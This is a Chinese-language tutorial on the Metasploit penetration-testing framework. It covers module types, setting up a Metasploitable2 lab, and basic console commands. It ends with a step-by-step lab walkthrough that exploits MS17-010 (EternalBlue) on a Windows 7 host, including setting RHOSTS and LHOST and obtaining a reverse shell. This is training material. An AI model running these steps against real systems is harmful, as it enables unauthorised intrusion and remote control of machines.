第一章 Metasploit渗透框架介绍及体系框架
1.1 Metasploit 渗透测试框架介绍
Metasploit 是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。使您能够查找,利用和验证漏洞。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。
1.2 Metasploit 体系框架
模块:模块组织按照不同的用途分为6种类型的模块
分为辅助模块(Aux)、渗透攻击模块(Exploits)、后渗透攻击模块(Post)、攻击载荷模块(payloads)、编码器模块(Encoders)、空指令模块(Nops)。
注:后渗透攻击模块(Post):在渗透攻击模块拿到目标shell权限后,进行进一步攻击的叫做后渗透攻击模块。
注:攻击载荷模块(payload):payload模块主要是用来建立目标机与攻击机稳定的连接。 通过攻击模块成功后利用payload可以返回一个shell,也可以进行程序注入等。
接口:msfconsole控制终端命令、msfcli命令行、msfgui图形化界面、armitage图形化界面以及msfapi远程调用接口
第二章 靶机搭建及Metasploit框架启动
2.1 Metasploitable2-Linux 靶机系统介绍
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计 作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。
2.2 Metasploitable2-Linux 靶机系统安装
Metasploitable2-Linux 靶机系统下载链接
1.下载完后直接解压缩到当前文件夹
2.打开Vmware后点击“打开虚拟机” ,如图:
3.打开“Metasploitable.vmx”虚拟机文件
4.开启虚拟机
使用普通用户:msfadmin 密码:msfadmin 进行登录
进去系统后使用命令:
#sudu passwd root//修改root管理员密码
修改root密码完成后使用命令:
#su root//切换root账户
配置静态IP :
#vim /etc/network/interfaces//修改网卡配置------------------------------#iface eth0 inet static#address IP#netmask 子网掩码#gateway 网关------------------------------
重启网卡配置:
#/etc/init.d/networking restart//重启网卡配置
2.3 启动 Metasploit 框架
Metasploit 程序需要使用Postgresql数据库,Kali自带Postgresql数据库
Postgresql 概述:
Postgresql是世界上最先进的开源关系型数据库
官网:/
启动三项:
启动Postgresql 数据库命令:systemctl start postgresql
开机自启动Postgresql命令:systemctl enable postgresql
启动Metasploit框架命令:msfconsole
出现“ msf6 > ”证明Metasploit框架启用成功,现在可以进行操作了,可以参考命令文档进行操作。
第三章 Metasploit框架基本使用方法
3.1 帮助(help)
#help
Core Commands 核心命令 Module Commands 模块命令 Job Commands 后台任务命令
Resource Commands 资源脚本命令
Database Backend Commands 数据库后端命令
Credentials Backend Commands 证书凭证后端命令
Developer Commands 开发人员相关命令
3.2 连接(connect)
Connect 为核心命令。使用方法:
#connect 192.168.1.1 80 //连接192.168.1.1的80端口#get /-------------------------------HTTP/1.1 400 Page not foundServer: GoAhead-WebsDate: Tue Mar 30 22:15:02 Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html-------------------------------
3.3 列出(show)
show 命令列出所有渗透攻击模块。
show命令有效参数:all,encoders,exploits,payloads,auxiliary,post,plugins,info,options,targets
#show all //列出所有渗透攻击模块
3.4 搜索(search)
search 命令:
#search mysql //搜索mysql相关漏洞模块#search name:mysql //查找mysql漏洞模块#search type:exploit //搜索exploit类型模块#search cve:CVE--8464 //搜索CVE漏洞#search cve: name:linux //搜索linux漏洞模块
search表单含义:
Name Disclosure Date Rank Check Description
名称 披露日期 等级 检查 说明
Rank 通常用来描述漏洞级别,每个漏洞利用模块基于它们对目标系统的影响都被标记了一个Rank字段。
Rank 按照可靠性降序排列:
great该漏洞利用程序有一个默认的目标系统,并且可以自动检测适当的目标系统,或者在目标服务的版本检查之后可以返回到一个特定的返回地址;good该漏洞利用程序有个默认的目标系统,并且是这种类型软件的“常见情况“(桌面应用程序的Windows 7,服务器的等);normal该漏洞利用程序是可靠的,但是依赖于特定的版本,并且不能可靠地自动检测。average该漏洞利用程序不可靠或难以利用;low对于通用的平台而言该漏洞程序几乎不能利用(或者低于50%的利用成功率);manual该漏洞利用程序不稳定或者难以利用并且基于拒绝服务(DOS);
3.5 使用(use)
命令:
#use 模块的Name //调用装载该模块#back //退出当前调用的模块。#info //查看Rank等级、发布时间、可复现的目标系统#run //执行exploit
第四章 模块整体使用流程
4.1 模块使用流程四步法
第一步 确定漏洞,已知漏洞,例:MS17-010;
第二步 查找模块,search MS17-010;
第三步 配置模块程序,use exploit、set payload、set 参数;
第四步 执行模块程序,exploit,run;
第五章 实战-使用msf渗透攻击Win7主机
5.1 第一步-确定目标及漏洞
目标:192.168.1.131
漏洞:MS17-010
目的:拿到最高权限,进行远程代码执行
用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。
5.2 第二步-查找验证模块并且调用
使用#msfconsole命令调用Metasploit框架,如图:
使用#search MS17-010命令,搜索查找MS17-010漏洞模块,如图:
这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。
#use auxiliary/scanner/smb/smb_ms17_010 //调用此模块
如图:
使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
使用#set RHOSTS 192.168.1.131 命令,设置目标地址。
最后使用#run命令去运行查看漏洞是否存在
Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010漏洞,可以去利用。
检测到该目标操作系统是Windows 7 专业版
接下来我们可以利用exploits模块进行渗透攻击。
5.3 第三步-利用exploist模块进行渗透
第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
先使用#back命令退出辅助模块,如图:
使用#search MS17-010命令,搜索MS17-010模块,如图:
我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。这里我们选择#2
#use exploit/windows/smb/ms17_010_eternalblue
使用#show options命令,查看需要设置的参数,如图:
这里我们看见多出一个payload选项,这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP
#set RHOSTS 192.168.1.131 //设置exploit,目标IP#set LHOST 192.168.1.138 //设置payload
如图:
最后使用#run命令去运行exploit
显示192.168.1.138:4444 -> 192.168.1.131:49160 我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。
我们可以使用#shell命令,在目标机打开一个shell。
如果显示乱码,用#chcp 65001命令,改成UTF-8代码页。